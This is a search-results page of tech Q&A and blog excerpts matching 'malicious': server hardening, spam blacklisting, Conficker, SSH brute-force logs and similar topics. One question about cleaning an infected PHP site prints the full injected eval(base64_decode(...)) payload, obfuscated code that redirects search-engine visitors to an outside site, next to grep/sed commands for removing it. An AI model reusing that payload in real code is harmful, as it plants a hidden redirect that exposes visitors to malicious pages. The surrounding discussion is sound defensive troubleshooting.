Search Results

Search found 417 results on 17 pages for 'malicious'.


  • 9 Gigapixel Photo Captures 84 Million Stars

    - by Jason Fitzpatrick
    The European Southern Observatory has released an absolutely enormous picture of the center of the Milky Way captured by their VISTA telescope–the image is 9 gigapixels and captures over 84 million stars. From the press release: The large mirror, wide field of view and very sensitive infrared detectors of ESO’s 4.1-metre Visible and Infrared Survey Telescope for Astronomy (VISTA) make it by far the best tool for this job. The team of astronomers is using data from the VISTA Variables in the Via Lactea programme (VVV), one of six public surveys carried out with VISTA. The data have been used to create a monumental 108 200 by 81 500 pixel colour image containing nearly nine billion pixels. This is one of the biggest astronomical images ever produced. The team has now used these data to compile the largest catalogue of the central concentration of stars in the Milky Way ever created. Want to check out all 9 billion glorious pixels in their uncompressed state? Be prepared to wait a bit, the uncompressed image is available for download but it weighs in at a massive 24.6GB. 84 Million Stars and Counting [via Wired]


  • DIY Halloween Decoration Uses Simple Silhouettes

    - by Jason Fitzpatrick
    While many of the Halloween decorating tricks we’ve shared over the years involve lots of wire, LEDs, and electronic guts, this one is thoroughly analog (and easy to put together). A simple set of silhouettes can cheaply and quickly transform the front of your house. Courtesy of Matt over at GeekDad, the transformation is easy to pull off. He explains: It’s really just about as simple as you could hope for. The materials needed are: black posterboard or black-painted cardboard; colored cellophane or tissue paper; and tape. The only tools needed are: measuring tape; some sort of drawing implement — chalk works really well; and scissors and/or X-Acto knife. And while you need some drawing talent, the scale is big enough and the need for precision little enough that you don’t need that much. For a more thorough rundown of the steps hit up the link below or hit up Google Images to find some monster silhouette inspiration. Window Monsters [Geek Dad]


  • Removing write permission on home and public_html on Centos/Cpanel

    - by user5858
    I'm running sites on two Cpanel accounts on my VPS on WHM. I'm using DSO php handler and Apache server on my Web server. After recent intrusion attacks I've chowned to root with permission 555 on $HOME and public_html folder. I'm on VPS with Cpanel on Centos. I'm running CMS based software like Joomla Drupal etc. Will this cause any problem to my VPS installation or server side processes? Drupal, Joomla, MyBB etc will not be affected by this. Some files will not be created like error_log. At least hackers will not be able to place any malicious code within home folder or the public_html folder.


  • Steps to make sure network is not blacklisted...Again

    - by msindle
    I have an interesting issue. I have a client that just got blacklisted due to spam being sent out over the last 2 days. I have my firewall configured to only allow mail to go outbound on port 25 from our mail server (Exchange 2010) exclusively and I have verified that there are no open relays on our transport rules. We are running Vipre Business and after running deep scans with updated definitions all computers come back clean. I ran a message tracking report on our Exchange server that shows all mail sent via the mail server over the last couple of weeks and didn't see anything malicious or out of the ordinary. I have also verified that there are no home devices or rogue computers on the network. For all practical purposes it appears that the network is clean, but we still wound up on 5 or 6 blacklists... Where should I start looking next? Is there a "best practices" guide that can help eradicate this issue? Thanks in advance! msindle


  • Secure Apache PHP vhost configuration

    - by jsimmons
    I'm looking to secure some websites running under Apache using suexec. At the moment PHP is executed with the user/group of the file being executed. This seems to me not secure enough. It stops vhosts interfering with each other, but does not stop malicious code writing anywhere in the vhost being used. I was thinking that a possibility would be to run scripts as nobody/vhost group, that way the vhost user could still have full access to the vhost directories, but executing PHP would only be able to write to files with g+w, and to execute files with g+x. This I think should stop arbitrary writing in the web dir from compromised PHP. Just wondering if this is crazy, ridiculous, stupid? Of course this would be done on top of existing security measures.


  • grep, xargs, sed to clean up PHP eval hack

    - by roktechie
    I'm attempting to use the commands found on http://devilsworkshop.org/tutorial/remove-evalbase64decode-malicious-code-grep-sed-commands-files-linux-server/55587/ to clean up a PHP eval based hack on a site. Sample code to match/remove <?php eval(base64_decode("ZXJyb3JfcmVwb3J0aW5nKDApOwokcWF6cGxtPWhlYWRlcnNfc2VudCgpOwppZiAoISRxYXpwbG0pewokcmVmZXJlcj0kX1NFUlZFUlsnSFRUUF9SRUZFUkVSJ107CiR1YWc9JF9TRVJWRVJbJ0hUVFBfVVNFUl9BR0VOVCddOwppZiAoJHVhZykgewppZiAoIXN0cmlzdHIoJHVhZywiTVNJRSA3LjAiKSBhbmQgIXN0cmlzdHIoJHVhZywiTVNJRSA2LjAiKSl7CmlmIChzdHJpc3RyKCRyZWZlcmVyLCJ5YWhvbyIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImJpbmciKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJyYW1ibGVyIikgb3Igc3RyaXN0cigkcmVmZXJlciwibGl2ZS5jb20iKSBvciBwcmVnX21hdGNoKCIveWFuZGV4XC5ydVwveWFuZHNlYXJjaFw/KC4qPylcJmxyXD0vIiwkcmVmZXJlcikgb3IgcHJlZ19tYXRjaCAoIi9nb29nbGVcLiguKj8pXC91cmxcP3NhLyIsJHJlZmVyZXIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImZhY2Vib29rLmNvbS9sIikgb3Igc3RyaXN0cigkcmVmZXJlciwiYW9sLmNvbSIpKSB7CmlmICghc3RyaXN0cigkcmVmZXJlciwiY2FjaGUiKSBvciAhc3RyaXN0cigkcmVmZXJlciwiaW51cmwiKSl7CmhlYWRlcigiTG9jYXRpb246IGh0dHA6Ly9sb29wZG93bi5sZmxpbmt1cC5jb20vIik7CmV4aXQoKTsKfQp9Cn0KfQp9")); Attempted command: sudo grep -lr --include=*.php "eval(base64_decode" /home/user/webdir | sudo xargs sed -i.bak 's/<?php eval(base64_decode[^;]*;/<?php\n/g' The sudo has been added as it is required to have permission to read/write on the dir I'm accessing. The files list properly from grep, but are not changed by sed. Any suggestions?


  • In Windows XP, is it possible to disable user credential caching for particular users

    - by kdt
    I understand that when Windows caches user credentials, these can sometimes be used by malicious parties to access other machines once a machine containing cached credentials is compromised, a method known as "pass the hash"[1]. For this reason I would like to get control over what's cached to reduce the risk of cached credentials being used maliciously. It is possible to prevent all caching by zeroing HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\CachedLogonsCount, but this is too indiscriminate: laptop users need to be able to log in when away from the network. What I would like to do is prevent the caching of credentials of certain users, such as administrators -- is there any way to do that in Windows XP? [1] http://www.lbl.gov/cyber/systems/pass-the-hash.html


  • Pick Up BioShock and Bioshock 2 for Price of a Big Mac Meal

    - by Jason Fitzpatrick
    Pre-ordering just opened on the third-installment of the highly-acclaimed horror-survival game series BioShock, BioShock Infinite. As part of the pre-order promotions, you can pick up a bundled copy of BioShock and BioShock 2 for a song. For the unfamiliar, BioShock is an atmospheric first-person-shooter backed up by an incredible storyline set in the underwater utopian-turned-dystopian city of Rapture. BioShock 2 continues the story in Rapture and the upcoming release (February 2013) of BioShock Infinite takes place in the same game universe but fifty years before the events of the first two installments. If that seems like the kind of game you could dig into, Amazon has the Windows-platform version of BioShock and BioShock 2 bundled together for a scant $7.49–81% off the Steam and general retail price. The best part about the promotion is you can either download the games from Amazon or, for those of you that use Steam, you can simply plug the game product key into Steam. You can read more about both the original two games and the upcoming release at the official BioShock site. BioShock Dual Pack [via Geeks Are Sexy]


  • Is WinRT really as secure as it's made out to be?

    - by IDWMaster
    Prior to releasing Windows 8, Microsoft claimed that all WinRT apps are cleanly removed from your computer after uninstalling them, and that WinRT apps should not interfere with other running applications, because they are run in a "sandboxed" environment. Microsoft has also claimed numerous times on Channel9 that Windows 8 apps are not run in a VM. So my question is: are these claims accurate? If the application is not running inside of a VM, how is it possible to protect the system against malicious code at runtime, assuming the attacker was able to bypass the screening process of the Windows Store system? Microsoft allows "native code" in WinRT apps, so wouldn't it be possible (using hand-coded assembly or some odd pointer manipulation trick) to call functions outside of the sandboxed environment and interfere with the rest of the system, if it's really "native code" and not some VM?


  • Can't open Control Panel or IE

    - by Josh
    I have an XP computer where whenever I try to open Control Panel nothing happens, nothing flashes on the screen. Same thing with Internet Explorer. I've scanned the computer with Malwarebytes and Avast, Malwarebytes found some Adware which it removed without problems. Avast found nothing. I looked at the running processes with Process Explorer, nothing malicious running. And looked at a Process Monitor output when I tried to run IE, nothing obviously wrong. The process just decides to exit. What can I try next? I would suspect corrupt IE install but Control Panel doesn't work either. UPDATE: Neither works in Safe Mode under the user account. (only 1 user on the computer) But in Safe Mode, under the built-in Administrator account, they work. So whatever is broken, is only broken in the one account. Anything under the HKCU registry key that could break this?


  • How can I run my program on a large number of computers? [closed]

    - by zenpoy
    I'm looking for a (preferably free) service for running an executable I wrote. It's not malicious, it's not a virus, it's not a scam, and if this is really important I can upload the python source code instead. I wrote a small crawler to gather information regarding the style of web pages for my MA project, and I need a lot more data. EDIT Here is more information on my problem and how I approach solving it, and where I'm stuck. As part of my research I'm trying to classify text based on its style (font-family for now), my data is based on web pages, so I wrote a client/server application - the client is a crawler that gathers this data and sends it to the server. The problem is that like 99% of the internet is Arial, Verdana and Helvetica - other fonts are far more rare, so I need to spend a very long time to gather enough data regarding these fonts. Hope this explains it.


  • Why is Chrome receiving data?

    - by Aero
    Chrome seems to be continually receiving data even though I'm not downloading anything. This is making a noticeable impact on my browsing speed. The first screenshot shows Chrome receiving data even though I'm not downloading anything (nor buffering a YouTube video etc.) Even after I completely close Google Chrome, the "chrome.exe" remains in the Resource Monitor list and the "Received bytes" column continually increases in the screenshot below. However, "chrome.exe" does not show up in the Processes tab of Task Manager. This only occurs sometimes, but I don't know why. I have tried running malware/virus scans to ensure that there is nothing malicious behind this, but those scans have shown nothing. Any ideas on what's causing this?


  • What is the technique used to make my IIS 7 serve all pages with an injected iframe

    - by Andre Carlucci
    Since my previous question was closed without an answer, I'm changing it a bit and asking again. All my pages are being served with a malicious iframe injected just before the html tag. The code looks like this: <iframe src= http://117.21.247.171:700/1.htm width=0 height=0></iframe> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="pt-BR"> ... Firstly I thought it could be something related to WordPress, but my asp.net sites are also infected and even if I create a static html file with nothing inside, the iframe is injected. I'm using a Windows Server 2008 R2 Standard with IIS7.5 7600. Does anyone know how to do this in IIS?


  • Tracing what program is making a network connection? (CentOS)

    - by Airjoe
    I was wondering if it is possible to find out which process is trying to make a specific network connection. On a server I support which hosts websites for about 200 users, the iptables firewall keeps blocking, as it should, a connection to 212.117.169.139 on port 80. Firefox reports this as an attack page (and at the least is obvious spam, if not malicious). It seems something on this server is trying to access this site for some reason, and although it's being blocked successfully, the requests seem to be going through every two to sixty seconds and I'd like to be able to find what process or script is doing this so I can handle it appropriately. Besides doing a grep to try and find if this IP is in some file (which probably won't even work because it may be working by hostname or it may be encoded), is there any way to find out some more information? Thanks!


  • How do I securely share my server?

    - by Blue
    I have a large dedicated server running Debian and I want to share it with about 6 friends of mine. I know I can simply just use adduser to create user accounts for them, but I want to know if they can, even as a regular user without root permissions, do anything malicious. I know by default they have read permissions for other users in the /home, and can solve that with chmod, but I just want to make sure that there's nothing else they can do. And also, is there any kind of script or program that makes it easier to create and manage shell users on a server?


  • Putting a whole linux server under source control (git)

    - by Tobias Hertkorn
    I am thinking about putting my whole Linux server under version control using git. The reason behind it being that that might be the easiest way to detect malicious modifications/rootkits. All I would naively think is necessary to check the integrity of the system: Mount the Linux partition every week or so using a rescue system, check if the git repository is still untampered and then issue a git status to detect any changes made to the system. Apart from the obvious waste in disk space, are there any other negative side-effects? Is it a totally crazy idea? Is it even a secure way to check against rootkits since I most likely would have to at least exclude /dev and /proc ?


  • What exactly is an invalid HTTP_HOST header

    - by rolling stone
    I've implemented Django's relatively new allowed hosts setting, which is meant to prevent attackers from submitting requests with a fake HTTP Host header. Since adding that setting, I now get anywhere from 20-100 emails a day notifying me of invalid HTTP_HOST headers. I've copied in an example of a typical error message below. I'm hosting my site on EC2, and am relatively new to setting up/maintaining a server, so my question is what exactly is happening here, and what is the best way to manage these invalid and I assume malicious requests? [Django] ERROR: Invalid HTTP_HOST header: 'www.launchastartup.com'.You may need to add u'www.launchastartup.com' to ALLOWED_HOSTS.


  • Should this be written in C or php?

    - by user1867842
    This is my code; it speaks for itself on what I'm trying to do. <?php define("html","<html>"); define("htmlEnd","</html>"); etc... etc... ?> What I'm trying to do is make a wrapper for html's tags so they won't be needed anymore. But I can't get any of the attributes for html elements to be defined in PHP. This again speaks for itself; I don't know any other way of saying this. I guess how would I make another mark-up language like HTML without any tags but still keep everything about HTML is what I'm trying to say. My idea is for preventing XSS. For example, creating a special framework for the website itself that way there is no way any malicious attacker can guess because they know the HTML or PHP. I just don't want to make my website or something, and then my website gets hacked. Or if I make a website for someone and the website gets hacked. I am going to look like an unprofessional web developer. And what if I never get a job again.


  • Is it necessary to change the default users and groups in VMware esxi 4.0 in order to have a secure

    - by Teevus
    By default esxi creates a number of users and groups including: daemon nfsnobody root nobody vimuser dcui How secure is this default security setup? Besides changing the root password, is it advisable to modify the default users and groups? E.g. does esxi use default passwords for the accounts or anything else that could be exploited by malicious users? My scenario is very basic and I don't require any custom users or groups as only sysadmins will ever need to administer the virtual infrastructure, and they can do so using the root account. Thanks


  • What is the best way to compare vhost traffic?

    - by Bob Flemming
    Recently one of my servers has been subjected to malicious ddos attacks. I have about 12 websites hosted on the server which uses name based v-hosting. I am trying to identify which virtual host(s) are getting bombarded with traffic. I have used tools such as iftop which is good for identifying hosts which are consuming lots of bandwidth, and also apachetop which is useful for identifying which resources are being requested on a single v-host. What I really need is a tool which allows me to see the amount of traffic being received by each v-host in real time so I can easily see which v-host is being targeted. Does such a tool exist?


  • Filtering downloading a file

    - by Ozgun Sunal
    People, I know there are several types of firewalls operating at different layers of OSI: ACLs (layer 3 firewalls filter based on port numbers and IP addresses), SPI (which examines the patterns of data at layer 3 and realises whether data content is malicious or not) and application layer firewalls which are capable of understanding the data at that level. Considering this, I'll give an example and learn what I need to do. Let's say we have a computer that has access to the Internet. I want to download a file or display a web page from a website but block access to another website/s or downloading. To do this, I can't block access to the web browser on the 3rd party firewall because that will shut down all access. ACLs won't already do it. So, which kind of firewall will make it possible to filter specific traffic and how?


  • Conficker keeps coming back

    - by PHLiGHT
    I hadn't run into anyone who actually got this virus until recently when dealing with a new client that didn't believe in patching their systems and consequently have been hit with this pest. I was under the impression that if you have KB958644 installed and ran the latest malicious software removal tool that conficker would be squashed. I have several systems that are fully patched, MSRT has removed the virus yet the bugger keeps coming back. This has even happened to a file server and a Domain Controller. What am I missing here? They are running AVG which I used to recommend but I have been doubting its effectiveness over the past year or so.


  • Securing a Cloud-Based Data Center

    - by Orgad Kimchi
    No doubt, with all the media reports about stolen databases and private information, a major concern when committing to a public or private cloud must be preventing unauthorized access of data and applications. In this article, we discuss the security features of Oracle Solaris 11 that provide a bullet-proof cloud environment. As an example, we show how the Oracle Solaris Remote Lab implementation utilizes these features to provide a high level of security for its users. Note: This is the second article in a series on cloud building with Oracle Solaris 11. See Part 1 here. When we build a cloud, the following aspects related to the security of the data and applications in the cloud become a concern:
      • Sensitive data must be protected from unauthorized access while residing on storage devices, during transmission between servers and clients, and when it is used by applications.
      • When a project is completed, all copies of sensitive data must be securely deleted and the original data must be kept permanently secure.
      • Communications between users and the cloud must be protected to prevent exposure of sensitive information from “man in a middle attacks.”
      • Limiting the operating system’s exposure protects against malicious attacks and penetration by unauthorized users or automated “bots” and “rootkits” designed to gain privileged access.
      • Strong authentication and authorization procedures further protect the operating system from tampering.
      • Denial of Service attacks, whether they are started intentionally by hackers or accidentally by other cloud users, must be quickly detected and deflected, and the service must be restored.
    In addition to the security features in the operating system, deep auditing provides a trail of actions that can identify violations, issues, and attempts to penetrate the security of the operating system. Combined, these threats and risks reinforce the need for enterprise-grade security solutions that are specifically designed to protect cloud environments. With Oracle Solaris 11, the security of any cloud is ensured. This article explains how.


  • How do web servers enforce the same-origin policy?

    - by BBnyc
    I'm diving deeper into developing RESTful APIs and have so far worked with a few different frameworks to achieve this. Of course I've run into the same-origin policy, and now I'm wondering how web servers (rather than web browsers) enforce it. From what I understand, some enforcing seems to happen on the browser's end (e.g., honoring an Access-Control-Allow-Origin header received from a server). But what about the server? For example, let's say a web server is hosting a JavaScript web app that accesses an API, also hosted on that server. I assume that server would enforce the same-origin policy --- so that only the JavaScript that is hosted on that server would be allowed to access the API. This would prevent someone else from writing a JavaScript client for that API and hosting it on another site, right? So how would a web server be able to stop a malicious client that would try to make AJAX requests to its API endpoints while claiming to be running JavaScript that originated from that same web server? What's the way most popular servers (Apache, nginx) protect against this kind of attack? Or is my understanding of this somehow off the mark? Or is the cross-origin policy only enforced on the client end?


  • Logs show lots of user attempts from unknown IP

    - by rodling
    I lost access to my instance which I host on AWS. Keypairing stopped working. I detached a volume and attached it to a new instance and what I found in logs was a long list of Nov 6 20:15:32 domU-12-31-39-01-7E-8A sshd[4925]: Invalid user cyrus from 210.193.52.113 Nov 6 20:15:32 domU-12-31-39-01-7E-8A sshd[4925]: input_userauth_request: invalid user cyrus [preauth] Nov 6 20:15:33 domU-12-31-39-01-7E-8A sshd[4925]: Received disconnect from 210.193.52.113: 11: Bye Bye [preauth] Where "cyrus" is changed by hundreds if not thousands of common names and items. What could this be? Brute force attack or something else malicious? I traced IP to Singapore, and I have no connection to Singapore. My thought is that this was a DoS attack since I lost access and server seemed to stop working. I'm not too versed on this, but ideas and solutions for this issue are welcome.

